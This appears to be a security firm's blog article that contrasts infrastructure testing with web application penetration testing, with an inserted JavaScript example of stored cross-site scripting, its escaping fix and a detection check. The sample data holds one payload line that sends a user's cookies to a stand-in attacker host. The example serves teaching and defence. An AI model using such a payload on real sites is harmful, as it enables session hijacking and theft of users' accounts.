While both infrastructure and web application security testing aim to find security gaps or vulnerabilities in an organisation's assets, it is important to be aware of how different they are. In what ways do they differ, and do you need both?
What is infrastructure security testing?
An infrastructure security test is primarily concerned with evaluating the computers, integrations, and systems that make up the organisation's network. In the age of digital transformation, with the day-to-day running of businesses increasingly contained within computer systems, the integrity and security of these networks are paramount.
A number of services can be offered under this heading, including internal and external attack simulation, social engineering, phishing, network configuration review, and threat response. The ultimate aim of this type of testing is to make recommendations on network changes and user training that improve network security and give the organisation as a whole greater protection from malicious attackers.
How is web application security testing different?
There is undoubtedly some cross-over between web application and infrastructure security testing. Web application penetration testing is intended to reveal flaws in the security mechanisms of a web application, such as a website and its associated dependencies, and to confirm that it protects data and maintains functionality as intended. A security assessment allows you to identify these potentially vulnerable areas and harden them against the possible attack vectors.
At Zoonou, our penetration testing service has been designed to provide sweeping coverage of the Open Web Application Security Project (OWASP) Top 10, an industry-recognised list of the most critical security risks found in web applications. Some of these risks, such as 'components with known vulnerabilities' or 'security misconfiguration', may also be picked up by an infrastructure security test, but only a web application penetration test can reveal flaws within the functionality of the application itself. For example, a malicious user may be able to gain an unfair advantage within a competition or a game, or inject a script into their user profile that then runs in other users' browsers without their knowledge.
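The profile-script case above is a stored cross-site scripting flaw, and it is a good illustration of why an infrastructure scan cannot find it: the server, the TLS configuration and the patch level can all be perfectly sound while the application itself hands one user's input to another user's browser as live markup. The snippet below is an added example (not code from this page or from Zoonou) showing a vulnerable profile renderer beside its hardened form, with a small check a tester might run over rendered output. The profile data, the `attacker.example` host and the function names are constructed for illustration.

```javascript
// Added example: stored XSS via a user-profile field, and the hardened fix.
// Not code from the page or from Zoonou; all data below is constructed.

// Constructed sample data: one ordinary profile and one whose "bio" carries a
// script payload that would run in any other user's browser when displayed.
const profiles = [
  { username: "alice", bio: "Security tester and coffee drinker" },
  {
    username: "mallory",
    bio: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  },
];

// Vulnerable: untrusted text is concatenated straight into the HTML response,
// so a <script> element saved in the profile becomes part of the page.
function renderProfileVulnerable(profile) {
  return `<h1>${profile.username}</h1><p class="bio">${profile.bio}</p>`;
}

// Hardened: every untrusted value is HTML-escaped before it reaches the markup.
// The ampersand must be replaced first so that later replacements are not
// double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

function renderProfileHardened(profile) {
  return `<h1>${escapeHtml(profile.username)}</h1>` +
    `<p class="bio">${escapeHtml(profile.bio)}</p>`;
}

// A crude tester's check over rendered output: does the page contain a live
// <script> element? Escaped text ("&lt;script") does not match.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run a renderer over every profile and report the usernames whose rendered
// page carries an executable script element.
function auditRenderer(renderer, data) {
  return data
    .filter((profile) => containsScriptTag(renderer(profile)))
    .map((profile) => profile.username);
}

// Stand-alone usage: the vulnerable renderer flags "mallory", the hardened one
// flags nobody.
console.log("vulnerable:", auditRenderer(renderProfileVulnerable, profiles));
console.log("hardened:", auditRenderer(renderProfileHardened, profiles));
```

Escaping at the point of output is the minimum fix; in a real application you would also apply a Content Security Policy and use a templating engine that escapes by default, so that a single forgotten call does not reintroduce the flaw.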
Web applications are never made equal: different services, integrations, and functionality are present in every one, so if the same organisation has built multiple applications, each needs to be tested separately.
What is the right approach?
Cybersecurity should not be treated as a nice-to-have but as a priority. Infrastructure security should sit at the core of your cybersecurity programme; however, if you own or develop a web application, you need to adopt a combined approach to ensure the integrity and full coverage of your digital assets.